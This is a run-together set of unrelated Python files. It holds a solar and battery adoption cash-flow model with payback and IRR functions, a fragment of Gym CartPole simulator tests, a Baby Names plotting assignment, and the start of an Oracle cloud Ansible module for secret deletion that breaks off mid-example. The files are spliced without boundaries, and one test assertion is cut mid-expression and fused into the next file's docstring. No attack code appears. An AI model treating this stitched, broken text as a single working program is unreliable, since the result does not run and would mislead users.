@decorators.fn_timer(logger = logger, tab_level = 2, prefix = '') def calc_max_market_share(dataframe, max_market_share_df): """ Calculates the maximum market share available for each agent. Parameters ---------- dataframe : pandas.DataFrame Attributes ---------- metric_value : float max_market_share_df : pandas.DataFrame Set by :meth:`settings.ScenarioSettings.get_max_marketshare`. Returns ------- pandas.DataFrame Input DataFrame with `max_market_share` and `metric` columns joined on. """ in_cols = list(dataframe.columns) dataframe = dataframe.reset_index() dataframe['business_model'] = 'host_owned' dataframe['metric'] = 'payback_period' # Convert metric value to integer as a primary key, then bound within max market share ranges max_payback = max_market_share_df[max_market_share_df.metric == 'payback_period'].metric_value.max() min_payback = max_market_share_df[max_market_share_df.metric == 'payback_period'].metric_value.min() max_mbs = max_market_share_df[max_market_share_df.metric == 'percent_monthly_bill_savings'].metric_value.max() min_mbs = max_market_share_df[max_market_share_df.metric == 'percent_monthly_bill_savings'].metric_value.min() # copy the metric values to a new column to store an edited version metric_value_bounded = dataframe['metric_value'].values.copy() # where the metric value exceeds the corresponding max market curve bounds, set the value to the corresponding bound metric_value_bounded[np.where((dataframe.metric == 'payback_period') & (dataframe['metric_value'] < min_payback))] = min_payback metric_value_bounded[np.where((dataframe.metric == 'payback_period') & (dataframe['metric_value'] > max_payback))] = max_payback metric_value_bounded[np.where((dataframe.metric == 'percent_monthly_bill_savings') & (dataframe['metric_value'] < min_mbs))] = min_mbs metric_value_bounded[np.where((dataframe.metric == 'percent_monthly_bill_savings') & (dataframe['metric_value'] > max_mbs))] = max_mbs dataframe['metric_value_bounded'] = metric_value_bounded # scale and round to nearest int dataframe['metric_value_as_factor'] = [int(round(i,1) * 100) for i in dataframe['metric_value_bounded']] # add a scaled key to the max_market_share dataframe too max_market_share_df['metric_value_as_factor'] = [int(round(float(i), 1) * 100) for i in max_market_share_df['metric_value']] # Join the max_market_share table and dataframe in order to select
the ultimate mms based on the metric value. dataframe = pd.merge(dataframe, max_market_share_df[['sector_abbr', 'max_market_share','metric_value_as_factor', 'metric', 'business_model']], how = 'left', on = ['sector_abbr','metric_value_as_factor','metric', 'business_model']) # Derate the maximum market share for commercial and industrial customers in leased buildings by (2/3) # based on the owner occupancy status (1 = owner-occupied, 2 = leased) dataframe['max_market_share'] = np.where(dataframe['owner_occupancy_status'] == 2, dataframe['max_market_share']/3,dataframe['max_market_share']) # out_cols = in_cols + ['max_market_share', 'metric'] out_cols = in_cols + ['max_market_share', 'metric_value_as_factor', 'metric', 'metric_value_bounded'] return dataframe[out_cols] def calc_ttd(cfs): """ Calculate time to double investment based on the MIRR. This is used for the commercial and industrial sectors. Parameters ---------- cfs : numpy.ndarray Project cash flows ($/yr). Returns ------- ttd : numpy.ndarray Time to double investment (years). """ irrs = virr(cfs, precision = 0.005, rmin = 0, rmax1 = 0.3, rmax2 = 0.5) # suppress errors due to irrs of nan with np.errstate(invalid = 'ignore'): irrs = np.where(irrs<=0,1e-6,irrs) ttd = np.log(2) / np.log(1 + irrs) ttd[ttd <= 0] = 0 ttd[ttd > 30] = 30.1 # also deal with ttd of nan by setting to max payback period (this should only occur when cashflows = 0) if not np.all(np.isnan(ttd) == np.all(cfs == 0, axis = 1)): raise Exception("np.nan found in ttd for non-zero cashflows") ttd[np.isnan(ttd)] = 30.1 return ttd.round(decimals = 1) # must be rounded to nearest 0.1 to join with max_market_share #%% def cashflow_constructor(bill_savings, pv_size, pv_price, pv_om, batt_cap, batt_power, batt_cost_per_kw, batt_cost_per_kwh, batt_om_per_kw, batt_om_per_kwh, batt_chg_frac, sector, itc, deprec_sched, fed_tax_rate, state_tax_rate, real_d, analysis_years, inflation, down_payment_fraction, loan_rate, loan_term, cash_incentives=np.array([0]), ibi=np.array([0]), cbi=np.array([0]), pbi=np.array([[0]]), print_statements=False): """ Calculate the system cash flows based on the capex, opex, bill savings, incentives, tax implications, and other factors Parameters ---------- bill_savings : "numpy.ndarray" Annual bill savings ($/yr) from system adoption from 1st year through system lifetime pv_size : "numpy.float64" system capacity selected by agent (kW) pv_price : "float" system capex ($/kW) pv_om : "float" system operation and maintanence cost ($/kW) batt_cap : "numpy.float64" energy capacity of battery selected (kWh) batt_power : "numpy.float64" demand capacity of battery selected (kW) batt_cost_per_kw : "float" capex of battery per kW installed ($/kW) batt_cost_per_kwh : "float" capex of battery per kWh installed ($/kWh) batt_om_per_kw : "float" opex of battery per kW installed ($/kW-yr) batt_om_per_kwh : "float" opex of battery per kW installed ($/kWh-yr) batt_chg_frac : "int" fraction of the battery's energy that it gets from a co-hosted PV system. Used for ITC calculation. sector : "str" agent sector itc : "float" fraction of capex offset by federal investment tax credit deprec_sched : "list" fraction of capex eligible for tax-based depreciation fed_tax_rate : "float" average tax rate as fraction from federal taxes state_tax_rate : "int" average tax rate as fraction from state taxes real_d : "float" annua discount rate in real terms analysis_years : "int" number of years to use in economic analysis inflation : "float" annual average inflation rate as fraction e.g. 
0.025 down_payment_fraction : "int" fraction of capex used as system down payment loan_rate_real : "float" real interest rate for debt payments loan_term : "int" number of years for loan term cash_incentives : "numpy.ndarray" array describing eligible cash-based incentives e.g. $ ibi : "numpy.ndarray" array describing eligible investment-based incentives e.g. 0.2 cbi : "numpy.ndarray" array describing eligible one-time capacity-based incentives e.g. $/kW pbi : "numpy.ndarray" array describing eligible ongoing performance-based incentives e.g $/kWh-yr Returns ------- cf : 'dtype Annual cash flows of project investment ($/yr) cf_discounted : 'dtype' Annual discounted cash flows of project investment ($/yr) npv : 'dtype' Net present value ($) of project investment using WACC bill_savings : 'dtype' Nominal cash flow of the annual bill savings over the lifetime of the system after_tax_bill_savings : 'dtype' Effective after-tax bill savings (electricity costs are tax-deductible for commercial entities) pv_cost : 'dtype' Capex of system in ($) batt_cost : 'dtype' Capex of battery in ($) installed_cost : 'dtype' Combined capex of system + battery up_front_cost : 'dtype Capex in 0th year as down payment batt_om_cf : 'dtype' Annual cashflows of battery opex operating_expenses : 'dtype' Combined annual opex of system + battery ($/yr) pv_itc_value : 'dtype' Absolute value of investment tax credit for system ($) batt_itc_value : 'dtype' Absolute value of investment tax credit for battery ($) itc_value : 'dtype' Absolute value of investment tax credit for combined system + battery ($) deprec_basis : 'dtype' Absolute value of depreciable basis of system ($) deprec_deductions : 'dtype' Annual amount of depreciable capital in given year ($) initial_debt : 'dtype' Amount of debt for loan ($) annual_principal_and_interest_payment : 'dtype' Annual amount of debt service payment, principal + interest ($) debt_balance : 'dtype' Annual amount of debt remaining in given year ($) interest_payments : 'dtype' Annual amount of interest payment in given year ($) principal_and_interest_payments : 'dtype' Array of annual principal and interest payments ($) total_taxable_income : 'dtype' Amount of stateincome from incentives eligible for taxes state_deductions : 'dtype' Reduction to state taxable income from interest, operating expenses, or bill savings depending on sector total_taxable_state_income_less_deductions : 'dtype' Total taxable state income less any applicable deductions state_income_taxes : 'dtype' Amount of state income tax i.e. net taxable income by tax rate fed_deductions : 'dtype' Reduction to federal taxable income from interest, operating expenses, or bill savings depending on sector total_taxable_fed_income_less_deductions : 'dtype' Total taxable federal income less any applicable deductions fed_income_taxes : 'dtype' Amount of federal income tax i.e. 
net taxable income by tax rate interest_payments_tax_savings : 'dtype' Amount of tax savings from deductions of interest payments operating_expenses_tax_savings : 'dtype' Amount of tax savings from deductions of operating expenses deprec_deductions_tax_savings : 'dtype' Amount of tax savings from deductions of capital depreciation elec_OM_deduction_decrease_tax_liability : 'dtype' Amount of tax savings from deductions of electricity costs as deductible business expense Todo ---- 1) Sales tax basis and rate 2) note that sales tax goes into depreciable basis 3) Propery taxes (res can deduct from income taxes, I think) 4) insurance 5) add pre-tax cash flow 6) add residential mortgage option 7) add carbon tax revenue 8) More exhaustive checking. I have confirmed basic formulations against SAM, but there are many permutations that haven't been checked. 9) make incentives reduce depreciable basis 10) add a flag for high incentive levels 11) battery price schedule, for replacements 12) improve inverter replacement 13) improve battery replacement 14) add inflation adjustment for replacement prices 15) improve deprec schedule handling 16) Make financing unique to each agent 17) Make battery replacements depreciation an input, with default of 7 year MACRS 18) Have a better way to deal with capacity vs effective capacity and battery costs 19) Make it so it can accept different loan terms """ #################### Massage inputs ######################################## # If given just a single value for an agent-specific variable, repeat that # variable for each agent. This assumes that the variable is intended to be # applied to each agent. if np.size(np.shape(bill_savings)) == 1: shape = (1, analysis_years + 1) else: shape = (np.shape(bill_savings)[0], analysis_years + 1) n_agents = shape[0] if np.size(sector) != n_agents or n_agents == 1: sector = np.repeat(sector, n_agents) if np.size(fed_tax_rate) != n_agents or n_agents == 1: fed_tax_rate = np.repeat(fed_tax_rate, n_agents) if np.size(state_tax_rate) != n_agents or n_agents == 1: state_tax_rate = np.repeat(state_tax_rate, n_agents) if np.size(itc) != n_agents or n_agents == 1: itc = np.repeat(itc, n_agents) if np.size(pv_size) != n_agents or n_agents == 1: pv_size = np.repeat(pv_size, n_agents) if np.size(pv_price) != n_agents or n_agents == 1: pv_price = np.repeat(pv_price, n_agents) if np.size(pv_om) != n_agents or n_agents == 1: pv_om = np.repeat(pv_om, n_agents) if np.size(batt_cap) != n_agents or n_agents == 1: batt_cap = np.repeat(batt_cap, n_agents) if np.size(batt_power) != n_agents or n_agents == 1: batt_power = np.repeat(batt_power, n_agents) if np.size(batt_cost_per_kw) != n_agents or n_agents == 1: batt_cost_per_kw = np.repeat(batt_cost_per_kw, n_agents) if np.size(batt_cost_per_kwh) != n_agents or n_agents == 1: batt_cost_per_kwh = np.repeat(batt_cost_per_kwh,n_agents) if np.size(batt_chg_frac) != n_agents or n_agents == 1: batt_chg_frac = np.repeat(batt_chg_frac, n_agents) if np.size(batt_om_per_kw) != n_agents or n_agents == 1: batt_om_per_kw = np.repeat(batt_om_per_kw, n_agents) if np.size(batt_om_per_kwh) != n_agents or n_agents == 1: batt_om_per_kwh = np.repeat(batt_om_per_kwh, n_agents) if np.size(real_d) != n_agents or n_agents == 1: real_d = np.repeat(real_d, n_agents) if np.size(down_payment_fraction) != n_agents or n_agents == 1: down_payment_fraction = np.repeat(down_payment_fraction, n_agents) if np.size(loan_rate) != n_agents or n_agents == 1: loan_rate = np.repeat(loan_rate, n_agents) if np.size(ibi) != n_agents or 
n_agents == 1: ibi = np.repeat(ibi, n_agents) if np.size(cbi) != n_agents or n_agents == 1: cbi = np.repeat(cbi, n_agents) if len(pbi) != n_agents: if len(pbi) > 0: pbi = np.tile(pbi[0], (n_agents, 1)) else: pbi = np.tile(np.array([0] * analysis_years), (n_agents, 1)) if np.array(deprec_sched).ndim == 1 or n_agents == 1: deprec_sched = np.array(deprec_sched) #################### Setup ######################################### effective_tax_rate = fed_tax_rate * (1 - state_tax_rate) + state_tax_rate if print_statements: logger.info('effective_tax_rate') logger.info(effective_tax_rate) logger.info(' ') cf = np.zeros(shape) inflation_adjustment = (1+inflation)**np.arange(analysis_years+1) #################### Bill Savings ######################################### # For C&I customers, bill savings are reduced by the effective tax rate, # assuming the cost of electricity could have otherwise been counted as an # O&M expense to reduce federal and state taxable income. bill_savings = bill_savings*inflation_adjustment # Adjust for inflation after_tax_bill_savings = np.zeros(shape) after_tax_bill_savings = (bill_savings.T * (1 - (sector!='res')*effective_tax_rate)).T # reduce value of savings because they could have otherwise be written off as operating expenses cf += bill_savings if print_statements: logger.info('bill savings cf') logger.info(np.sum(cf,1)) logger.info(' ') #################### Installed Costs ###################################### # Assumes that cash incentives, IBIs, and CBIs will be monetized in year 0, # reducing the up front installed cost that determines debt levels. pv_cost = pv_size*pv_price # assume pv_price includes initial inverter purchase batt_cost = batt_power*batt_cost_per_kw + batt_cap*batt_cost_per_kwh installed_cost = pv_cost + batt_cost if print_statements: logger.info('installed_cost') logger.info(pv_cost) logger.info(' ') net_installed_cost = installed_cost - (installed_cost * ibi) -cash_incentives - cbi wacc = (((down_payment_fraction * net_installed_cost) / net_installed_cost) * real_d) + ((((1-down_payment_fraction) * net_installed_cost) / net_installed_cost) * loan_rate) up_front_cost = net_installed_cost * down_payment_fraction if print_statements: logger.info('wacc') logger.info(wacc) logger.info(' ') cf[:,0] -= net_installed_cost #all installation costs upfront for WACC if print_statements: logger.info('bill savings minus up front cost') logger.info(np.sum(cf,1)) logger.info(' ') #################### Operating Expenses ################################### # Nominally includes O&M, replacement costs, fuel, insurance, and property # tax - although currently only includes O&M and replacements. 
# All operating expenses increase with inflation operating_expenses_cf = np.zeros(shape) batt_om_cf = np.zeros(shape) # Battery O&M (replacement costs added to base O&M when costs were ingested) batt_om_cf[:,1:] = (batt_power*batt_om_per_kw + batt_cap*batt_om_per_kwh).reshape(n_agents, 1) # PV O&M operating_expenses_cf[:,1:] = (pv_om * pv_size).reshape(n_agents, 1) operating_expenses_cf += batt_om_cf operating_expenses_cf = operating_expenses_cf*inflation_adjustment cf -= operating_expenses_cf if print_statements: logger.info('minus operating expenses') logger.info(cf) logger.info(' ') #################### Federal ITC ######################################### pv_itc_value = pv_cost * itc batt_itc_value = batt_cost * itc * batt_chg_frac * (batt_chg_frac>=0.75) itc_value = pv_itc_value + batt_itc_value # itc value added in fed_tax_savings_or_liability if print_statements: logger.info('itc value') logger.info(itc_value) logger.info(' ') #################### Depreciation ######################################### # Per SAM, depreciable basis is sum of total installed cost and total # construction financing costs, less 50% of ITC and any incentives that # reduce the depreciable basis. deprec_deductions = np.zeros(shape) deprec_basis = installed_cost - itc_value * 0.5 deprec_deductions[:, 1: np.size(deprec_sched) + 1] = np.array([x * deprec_sched.T for x in deprec_basis]) # to be used later in fed tax calcs if print_statements: logger.info('deprec_deductions') logger.info(deprec_deductions) logger.info(' ') #################### Debt cash flow ####################################### # Deduct loan interest payments from state & federal income taxes for res # mortgage and C&I. No deduction for res loan. # note that the debt balance in year0 is different from principal if there # are any ibi or cbi. Not included here yet. 
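# Two notes on the financing terms used in this section:
# 1) The wacc computed above simplifies (for a non-zero net installed cost) to
#      wacc = down_payment_fraction * real_d + (1 - down_payment_fraction) * loan_rate
#    i.e. the equity discount rate and loan rate blended by the down-payment share.
# 2) The annual debt payment below uses the standard annuity formula
#      payment = principal * r * (1 + r)**n / ((1 + r)**n - 1)
#    As a hypothetical check (illustrative numbers only), a $10,000 loan at
#    loan_rate = 0.05 over a 10-year loan_term gives roughly $1,295 per year,
#    which fully amortizes the balance by the end of the term.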
# debt balance, interest payment, principal payment, total payment initial_debt = net_installed_cost - up_front_cost if print_statements: logger.info('initial_debt') logger.info(initial_debt) logger.info(' ') annual_principal_and_interest_payment = initial_debt * (loan_rate*(1+loan_rate)**loan_term) / ((1+loan_rate)**loan_term - 1) if print_statements: logger.info('annual_principal_and_interest_payment') logger.info(annual_principal_and_interest_payment) logger.info(' ') debt_balance = np.zeros(shape) interest_payments = np.zeros(shape) principal_and_interest_payments = np.zeros(shape) debt_balance[:,:loan_term] = (initial_debt*((1+loan_rate.reshape(n_agents,1))**np.arange(loan_term)).T).T - (annual_principal_and_interest_payment*(((1+loan_rate).reshape(n_agents,1)**np.arange(loan_term) - 1.0)/loan_rate.reshape(n_agents,1)).T).T interest_payments[:,1:] = (debt_balance[:,:-1].T * loan_rate).T if print_statements: logger.info('interest_payments') logger.info(interest_payments) logger.info(' ') logger.info('sum of interst_payments') logger.info(np.sum(interest_payments)) logger.info(' ') logger.info('net_installed_cost') logger.info(net_installed_cost) logger.info(' ') logger.info('sum of net_installed_cost and interest payments') logger.info(net_installed_cost + np.sum(interest_payments)) logger.info(' ') principal_and_interest_payments[:,1:loan_term+1] = annual_principal_and_interest_payment.reshape(n_agents, 1) if print_statements: logger.info('principal_and_interest_payments') logger.info(principal_and_interest_payments) logger.info(' ') logger.info('sum of principal and interest payments, and upfront cost') logger.info(np.sum(principal_and_interest_payments) + up_front_cost) logger.info(' ') logger.info('cf minus intrest payments') logger.info(np.sum(cf,1)) logger.info(' ') #################### State Income Tax ######################################### # Per SAM, taxable income is CBIs and PBIs (but not IBIs) # Assumes no state depreciation # Assumes that revenue from DG is not taxable income # total_taxable_income = np.zeros(shape) # total_taxable_income[:,1] = cbi # total_taxable_income[:,:np.shape(pbi)[1]] += pbi total_taxable_income = np.zeros(shape) total_taxable_income[:, 1] = cbi total_taxable_income[:, 1:] += pbi state_deductions = np.zeros(shape) state_deductions += (interest_payments.T * (sector!='res')).T state_deductions += (operating_expenses_cf.T * (sector!='res')).T state_deductions -= (bill_savings.T * (sector!='res')).T total_taxable_state_income_less_deductions = total_taxable_income - state_deductions state_income_taxes = (total_taxable_state_income_less_deductions.T * state_tax_rate).T state_tax_savings_or_liability = -state_income_taxes if print_statements: logger.info('state_tax_savings') logger.info(state_tax_savings_or_liability) cf += state_tax_savings_or_liability ################## Federal Income Tax ######################################### # Assumes all deductions are federal fed_deductions = np.zeros(shape) fed_deductions += (interest_payments.T * (sector!='res')).T fed_deductions += (deprec_deductions.T * (sector!='res')).T fed_deductions += state_income_taxes fed_deductions += (operating_expenses_cf.T * (sector!='res')).T fed_deductions -= (bill_savings.T * (sector!='res')).T total_taxable_fed_income_less_deductions = total_taxable_income - fed_deductions fed_income_taxes = (total_taxable_fed_income_less_deductions.T * fed_tax_rate).T fed_tax_savings_or_liability_less_itc = -fed_income_taxes if print_statements: logger.info('federal_tax_savings') 
logger.info(fed_tax_savings_or_liability_less_itc) cf += fed_tax_savings_or_liability_less_itc cf[:,1] += itc_value ######################## Packaging tax outputs ############################ # interest_payments_tax_savings = (interest_payments.T * effective_tax_rate).T operating_expenses_tax_savings = (operating_expenses_cf.T * effective_tax_rate).T deprec_deductions_tax_savings = (deprec_deductions.T * fed_tax_rate).T elec_OM_deduction_decrease_tax_liability = (bill_savings.T * effective_tax_rate).T ########################### Post Processing ############################### powers = np.zeros(shape, int) powers[:,:] = np.array(list(range(analysis_years+1))) discounts = np.zeros(shape, float) discounts[:,:] = (1/(1+wacc)).reshape(n_agents, 1) if print_statements: logger.info('discounts') logger.info(np.mean(discounts,1)) logger.info(' ') cf_discounted = cf * np.power(discounts, powers) cf_discounted = np.nan_to_num(cf_discounted) if print_statements: logger.info('cf not discounted') logger.info(cf) logger.info(' ') if print_statements: logger.info('cf_discounted') logger.info(cf_discounted) logger.info(' ') npv = np.sum(cf_discounted, 1) if print_statements: logger.info('npv') logger.info(npv) logger.info(' ') ########################### Package Results ############################### results = {'cf':cf, 'cf_discounted':cf_discounted, 'npv':npv, 'bill_savings':bill_savings, 'after_tax_bill_savings':after_tax_bill_savings, 'pv_cost':pv_cost, 'batt_cost':batt_cost, 'installed_cost':installed_cost, 'up_front_cost':up_front_cost, 'batt_om_cf':batt_om_cf, 'operating_expenses':operating_expenses_cf, 'pv_itc_value':pv_itc_value, 'batt_itc_value':batt_itc_value, 'itc_value':itc_value, 'deprec_basis':deprec_basis, 'deprec_deductions':deprec_deductions, 'initial_debt':initial_debt, 'annual_principal_and_interest_payment':annual_principal_and_interest_payment, 'debt_balance':debt_balance, 'interest_payments':interest_payments, 'principal_and_interest_payments':principal_and_interest_payments, 'total_taxable_income':total_taxable_income, 'state_deductions':state_deductions, 'total_taxable_state_income_less_deductions':total_taxable_state_income_less_deductions, 'state_income_taxes':state_income_taxes, 'fed_deductions':fed_deductions, 'total_taxable_fed_income_less_deductions':total_taxable_fed_income_less_deductions, 'fed_income_taxes':fed_income_taxes, # 'interest_payments_tax_savings':interest_payments_tax_savings, 'operating_expenses_tax_savings':operating_expenses_tax_savings, 'deprec_deductions_tax_savings':deprec_deductions_tax_savings, 'elec_OM_deduction_decrease_tax_liability':elec_OM_deduction_decrease_tax_liability} return results #============================================================================== def calc_payback_vectorized(cfs, tech_lifetime): """ Payback calculator. Can be either simple payback or discounted payback, depending on whether the input cash flow is discounted. Parameters ---------- cfs : numpy.ndarray Project cash flows ($/yr). tech_lifetime : int Lifetime of technology used for project. 
Returns ------- pp : numpy.ndarray Interpolated payback period (years) """ years = np.array([np.arange(0, tech_lifetime)] * cfs.shape[0]) cum_cfs = cfs.cumsum(axis = 1) no_payback = np.logical_or(cum_cfs[:, -1] <= 0, np.all(cum_cfs <= 0, axis = 1)) instant_payback = np.all(cum_cfs > 0, axis = 1) neg_to_pos_years = np.diff(np.sign(cum_cfs)) > 0 base_years = np.amax(np.where(neg_to_pos_years, years, -1), axis = 1) # replace values of -1 with 30 base_years_fix = np.where(base_years == -1, tech_lifetime - 1, base_years) base_year_mask = years == base_years_fix[:, np.newaxis] # base year values base_year_values = cum_cfs[:, :-1][base_year_mask] next_year_values = cum_cfs[:, 1:][base_year_mask] frac_years = base_year_values/(base_year_values - next_year_values) pp_year = base_years_fix + frac_years pp_precise = np.where(no_payback, tech_lifetime, np.where(instant_payback, 0, pp_year)) pp_final = np.array(pp_precise).round(decimals = 3) return pp_final #%% def virr(cfs, precision = 0.005, rmin = 0, rmax1 = 0.3, rmax2 = 0.5): """ Vectorized IRR calculator. First calculate a 3D array of the discounted cash flows along cash flow series, time period, and discount rate. Sum over time to collapse to a 2D array which gives the NPV along a range of discount rates for each cash flow series. Next, find crossover where NPV is zero--corresponds to the lowest real IRR value. Parameters ---------- cfs : numpy.ndarray Rows are cash flow series, cols are time periods precision : float Level of accuracy for the inner IRR band, default value 0.005% rmin : float Lower bound of the inner IRR band default value 0% rmax1 : float Upper bound of the inner IRR band default value 30% rmax2 : float upper bound of the outer IRR band. e.g. 50% Values in the outer band are calculated to 1% precision, IRRs outside the upper band return the rmax2 value. Returns ------- numpy.ndarray IRRs for cash flow series Notes ----- For performance, negative IRRs are not calculated, returns "-1" and values are only calculated to an acceptable precision. 
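Examples
--------
A hypothetical cash flow series (illustrative values only)::

    cfs = np.array([[-100., 30., 40., 50., 60.]])
    virr(cfs)  # ~0.25

The true IRR of this series is just under 25%, so with the default 0.005
precision the NPV first turns negative at the 0.25 grid point and 0.25 is
returned.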
""" if cfs.ndim == 1: cfs = cfs.reshape(1,len(cfs)) # Range of time periods years = np.arange(0,cfs.shape[1]) # Range of the discount rates rates_length1 = int((rmax1 - rmin)/precision) + 1 rates_length2 = int((rmax2 - rmax1)/0.01) rates = np.zeros((rates_length1 + rates_length2,)) rates[:rates_length1] = np.linspace(0,0.3,rates_length1) rates[rates_length1:] = np.linspace(0.31,0.5,rates_length2) # Discount rate multiplier rows are years, cols are rates drm = (1+rates)**-years[:,np.newaxis] # Calculate discounted cfs discounted_cfs = cfs[:,:,np.newaxis] * drm # Calculate NPV array by summing over discounted cashflows npv = discounted_cfs.sum(axis = 1) # Convert npv into boolean for positives (0) and negatives (1) signs = npv < 0 # Find the pairwise differences in boolean values # sign crosses over, the pairwise diff will be True crossovers = np.diff(signs,1,1) # Extract the irr from the first crossover for each row irr = np.min(np.ma.masked_equal(rates[1:]* crossovers,0),1) # deal with negative irrs negative_irrs = cfs.sum(1) < 0 r = np.where(negative_irrs,-1,irr) # where the implied irr exceeds 0.5, simply cap it at 0.5 r = np.where(irr.mask * (negative_irrs == False), 0.5, r) # where cashflows are all zero, set irr to nan r = np.where(np.all(cfs == 0, axis = 1), np.nan, r) return r pythonSimulatorsTests.py import pythonSimulators as pySims import gym import numpy as np import multiprocessing as mp #####Test 0: try to sample from StateSampler and check if the dimension is correct print("Start Test 0: sample from StateSampler") gymEnv = gym.make("CartPole-v0") gymEnv.reset() stateSampler = pySims.GymResetSampler(gymEnv) print(stateSampler.sample(10)) assert stateSampler.sample(10).shape == (10,4) print("Test 0 is OK") #####Test 1: try to reset the state0 from given state0 print("Start Test 1: ResetFromState0") gymEnv = gym.make("CartPole-v0") gymEnv.reset() state0 = np.array([0,1,-0.2,0.5]) sim=pySims.GymSimulator(gymEnv) sim.ResetFromS0(state0) eps=1e-17 assert ( np.linalg.norm(state0-sim.GetEnvState())0 """ SC101 Baby Names Project Adapted from 's Baby Names assignment by . YOUR DESCRIPTION HERE """ import tkinter import babynames import babygraphicsgui as gui from campy.gui.events.timer import pause FILENAMES = [ 'data/full/baby-1900.txt', 'data/full/baby-1910.txt', 'data/full/baby-1920.txt', 'data/full/baby-1930.txt', 'data/full/baby-1940.txt', 'data/full/baby-1950.txt', 'data/full/baby-1960.txt', 'data/full/baby-1970.txt', 'data/full/baby-1980.txt', 'data/full/baby-1990.txt', 'data/full/baby-2000.txt', 'data/full/baby-2010.txt' ] CANVAS_WIDTH = 1000 CANVAS_HEIGHT = 600 YEARS = [1900, 1910, 1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010] GRAPH_MARGIN_SIZE = 20 COLORS = ['red', 'purple', 'green', 'blue'] TEXT_DX = 2 LINE_WIDTH = 2 MAX_RANK = 1000 DELAY = 20 def get_x_coordinate(width, year_index): """ Given the width of the canvas and the index of the current year in the YEARS list, returns the x coordinate of the vertical line associated with that year. Input: width (int): The width of the canvas year_index (int): The index of the current year in the YEARS list Returns: x_coordinate (int): The x coordinate of the vertical line associated with the specified year. """ year_space = (width-GRAPH_MARGIN_SIZE)//len(YEARS) x_coordinate = GRAPH_MARGIN_SIZE+int(year_index)*year_space return x_coordinate def draw_fixed_lines(canvas): """ Erases all existing information on the given canvas and then draws the fixed background lines on it. 
Input: canvas (Tkinter Canvas): The canvas on which we are drawing. Returns: This function does not return any value. """ canvas.delete('all') # delete all existing lines from the canvas # Write your code below this line canvas.create_line(GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE, CANVAS_WIDTH-GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE) canvas.create_line(GRAPH_MARGIN_SIZE, CANVAS_HEIGHT-GRAPH_MARGIN_SIZE, CANVAS_WIDTH-GRAPH_MARGIN_SIZE, CANVAS_HEIGHT-GRAPH_MARGIN_SIZE) for year in range(len(YEARS)): x = get_x_coordinate(CANVAS_WIDTH, year) canvas.create_line(x, 0, x, CANVAS_HEIGHT) canvas.create_text(x+TEXT_DX, CANVAS_HEIGHT-GRAPH_MARGIN_SIZE, text=YEARS[year], font='roboto 12', anchor=tkinter.NW) ################################# def draw_names(canvas, name_data, lookup_names): """ Given a dict of baby name data and a list of name, plots the historical trend of those names onto the canvas. Input: canvas (Tkinter Canvas): The canvas on which we are drawing. name_data (dict): Dictionary holding baby name data lookup_names (List[str]): A list of names whose data you want to plot Returns: This function does not return any value. """ draw_fixed_lines(canvas) # draw the fixed background grid # Write your code below this line rank_space = (CANVAS_HEIGHT-GRAPH_MARGIN_SIZE*2) / MAX_RANK color_ct = 0 for name in lookup_names: # First for loop is to read the value of key name in name_data name_dict = name_data[name] point_lst = [] # record the point to draw line """ Second for loop, read the constant YEARS and see if it's in the """ for i in range(len(YEARS)): x_point = get_x_coordinate(CANVAS_WIDTH, i) if str(YEARS[i]) in name_dict: y_point_in_rank = GRAPH_MARGIN_SIZE+name_dict[str(YEARS[i])]*rank_space canvas.create_text(x_point + TEXT_DX, y_point_in_rank, text=name + ' ' + str(name_dict[str(YEARS[i])]), font='roboto 12', anchor=tkinter.SW, fill=COLORS[color_ct]) canvas.create_text(x_point + TEXT_DX, y_point_in_rank, text='♥︎', fill=COLORS[color_ct]) point_lst.append([x_point, y_point_in_rank]) else: y_point_out_of_rank = CANVAS_HEIGHT-GRAPH_MARGIN_SIZE canvas.create_text(x_point + TEXT_DX, y_point_out_of_rank, text=name + ' * ', font='roboto 12', anchor=tkinter.SW, fill=COLORS[color_ct]) canvas.create_text(x_point + TEXT_DX, y_point_out_of_rank, text='♥︎', fill=COLORS[color_ct]) point_lst.append([x_point, y_point_out_of_rank]) for point in range(len(point_lst)): if point+1 in range(len(point_lst)): canvas.create_line(point_lst[point][0], point_lst[point][1], point_lst[point+1][0], point_lst[point+1][1], fill=COLORS[color_ct], width=LINE_WIDTH) pause(DELAY) else: break color_ct = (color_ct + 1) % len(COLORS) ################################# # main() code is provided, feel free to read through it but DO NOT MODIFY def main(): # Load data name_data = babynames.read_files(FILENAMES) # Create the window and the canvas top = tkinter.Tk() top.wm_title('Baby Names') canvas = gui.make_gui(top, CANVAS_WIDTH, CANVAS_HEIGHT, name_data, draw_names, babynames.search_names) # Call draw_fixed_lines() once at startup so we have the lines # even before the user types anything. draw_fixed_lines(canvas) # This line starts the graphical loop that is responsible for # processing user interactions and plotting data top.mainloop() if __name__ == '__main__': main() #!/usr/bin/python # Copyright (c) 2017, 2021 Oracle and/or its affiliates. # This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license. 
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Apache License v2.0 # See LICENSE.TXT for details. # GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { "metadata_version": "1.1", "status": ["preview"], "supported_by": "community", } DOCUMENTATION = """ --- module: oci_vault_secret_actions short_description: Perform actions on a Secret resource in Oracle Cloud Infrastructure description: - Perform actions on a Secret resource in Oracle Cloud Infrastructure - For I(action=cancel_secret_deletion), cancels the pending deletion of the specified secret. Canceling a scheduled deletion restores the secret's lifecycle state to what it was before you scheduled the secret for deletion. - For I(action=schedule_secret_deletion), schedules the deletion of the specified secret. This sets the lifecycle state of the secret to `PENDING_DELETION` and then deletes it after the specified retention period ends. version_added: "2.9" author: Oracle (@oracle) options: secret_id: description: - The OCID of the secret. type: str aliases: ["id"] required: true time_of_deletion: description: - An optional property indicating when to delete the secret version, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. - Applicable only for I(action=schedule_secret_deletion). type: str action: description: - The action to perform on the Secret. type: str required: true choices: - "cancel_secret_deletion" - "schedule_secret_deletion" extends_documentation_fragment: [ oracle.oci.oracle ] """ EXAMPLES = """ - name: Perform action cancel_secret_deletion on secret oci_vault_secret_actions: secret_id: ocid1.secret.oc1..xxxxxxEXAMPLExxxxxx action: cancel_secret_deletion - name: Perform action schedule_secret_deletion on secret oci_vault_secret_actions: time_of_deletion: 2018-04-03T21:10:29.600Z secret_id: 